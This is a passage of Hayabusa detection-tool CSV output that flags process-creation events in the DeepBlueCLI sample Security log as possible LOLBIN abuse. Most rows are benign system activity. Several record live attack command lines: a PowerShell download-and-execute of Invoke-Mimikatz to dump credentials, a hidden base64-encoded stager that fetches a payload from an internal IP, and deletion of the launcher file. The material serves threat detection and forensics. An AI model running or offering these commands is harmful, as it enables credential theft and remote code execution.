0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 